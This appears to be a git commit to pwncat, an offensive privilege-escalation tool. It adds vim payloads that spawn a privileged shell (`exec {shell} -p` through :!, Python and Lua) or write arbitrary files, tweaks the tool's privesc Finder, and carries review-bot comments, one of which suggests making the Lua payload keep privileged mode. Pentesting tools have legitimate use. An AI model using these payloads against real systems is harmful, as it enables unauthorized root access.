
Got vim seemingly working as a GTFObin...

This commit is contained in:
John Hammond 2020-05-23 04:34:37 -04:00
parent 3801b50f14
commit 2eb9487e64
5 changed files with 66 additions and 16 deletions


@ -879,19 +879,19 @@
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
@ -907,10 +907,47 @@
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
],
"vim.basic": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [
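Review bot: The lua technique in the new `vim.basic` block, `':lua os.execute(\"reset; exec {shell}\")'`, is the only shell entry here that execs `{shell}` without `-p`, so if this block is used against a setuid vim the bash/ksh privileged mode the other three entries rely on is dropped on that path; make it `':lua os.execute(\"reset; exec {shell} -p\")'` for consistency. `-p` is a bash/ksh flag, so if `{shell}` can resolve to a shell that rejects it these entries fail instead of spawning a shell — worth a one-line comment at the top of the block. The trailing `// Vim can PROBABLY file write... but I have not figured that out just yet.` is stale now that a `"write"` entry sits directly above it; drop it or replace it with a note that the `-es` entries read the payload through `/dev/stdin`. The enclosing object continues past the hunk into the `wish` entry.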


@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat
from pwncat import util
from pwncat.remote import Victim
@ -80,5 +76,11 @@ def main():
if __name__ == "__main__":
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
main()
sys.exit(0)
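Review bot: Wrapping the `main()` call in `warnings.catch_warnings()` widens the SAWarning suppression from import time to the entire session, so any SQLAlchemy warning raised while pwncat is running is now dropped; if that is the intent, a module-level `warnings.filterwarnings("ignore", category=sa_exc.SAWarning)` states it in one line and avoids a context manager whose restore is immediately followed by `sys.exit(0)`. If it is not, keep the guard around the imports only, as the removed lines did, and let runtime warnings reach the user. Either way a short comment saying why these warnings are unwanted would help the next reader.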


@ -238,7 +238,7 @@ class CommandParser:
# We have a connection! Go back to raw mode
pwncat.victim.state = State.RAW
self.running = False
except Exception as exc:
except (Exception, KeyboardInterrupt) as exc:
traceback.print_exc()
continue
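Review bot: Adding `KeyboardInterrupt` to the handler at `except (Exception, KeyboardInterrupt) as exc:` makes Ctrl-C print a full traceback and `continue` the loop, so the user loses the usual way to abort the prompt, and the bound `exc` is still unused. Give the interrupt its own clause, e.g. `except KeyboardInterrupt:` followed by `print()` and `continue`, and keep `except Exception:` for real errors. If the intent is that an interrupt during a connection attempt must not kill the parser, say so in a comment on the clause, since `self.running = False` just above is only reached on success. The loop containing this handler starts before the hunk.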
@ -299,7 +299,7 @@ class CommandParser:
command.parser.prog = prog_name
except SystemExit:
# The arguments were icncorrect
# The arguments were incorrect
return


@ -265,7 +265,7 @@ class MethodWrapper:
return self.method.build_payload(self.binary_path, **kwargs)
def exit(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries(
original = self.method.binary.gtfo.resolve_binaries(
self.method.exit,
ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z,
@ -275,6 +275,11 @@ class MethodWrapper:
**kwargs,
)
if original == "" and Capability.SHELL in self.cap:
original = "exit\n"
return original
def input(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries(
self.method.input,
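Review bot: The new fallback `if original == "" and Capability.SHELL in self.cap:` only triggers on the empty string, so if `resolve_binaries` can return `None` or whitespace for a method with no exit (not visible here) the default is skipped; `if not original and Capability.SHELL in self.cap:` covers the `None` case at no cost. The method also has no docstring; add one such as `"""Resolve the method's exit sequence; shell-capable methods with no explicit exit fall back to a plain "exit" line."""` so the implicit default is discoverable by whoever writes new gtfobins entries. The class continues outside the hunk.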


@ -277,12 +277,14 @@ class Finder:
for technique in techniques:
if Capability.SHELL in technique.capabilities:
try:
# Attempt our basic, known technique
shlvl = pwncat.victim.getenv("SHLVL")
exit_script = technique.method.execute(technique)
pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable
time.sleep(0.1)
time.sleep(0.1) # This seems inevitable for some privescs...
pwncat.victim.reset()
# Check that we actually succeeded
@ -300,7 +302,9 @@ class Finder:
# Get out of this subshell. We don't need it
# pwncat.victim.process(exit_script, delim=False)
pwncat.victim.run(exit_script, wait=False)
time.sleep(0.1) # Still inevitable for some privescs...
pwncat.victim.recvuntil("\n")
# Clean up whatever mess was left over
@ -312,6 +316,8 @@ class Finder:
# Continue on as if it hadn't worked.
except PrivescError:
pass
except ValueError:
raise PrivescError
if Capability.READ in technique.capabilities:
readers.append(technique)
if Capability.WRITE in technique.capabilities:
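Review bot: The new `except ValueError: raise PrivescError` aborts the whole `for technique in techniques:` loop on the first technique whose execution raises ValueError, whereas the `except PrivescError: pass` directly above it deliberately skips a failed technique and moves on; unless a ValueError really invalidates the whole search it should mirror that clause, and if it must propagate, chain it so the cause survives, `except ValueError as exc:` then `raise PrivescError(str(exc)) from exc`. The `shlvl = pwncat.victim.getenv("SHLVL")` added in the first hunk is not used anywhere visible; if it feeds a check outside the hunk a comment naming it would help, otherwise it is dead. The loop and its enclosing method continue outside the hunk.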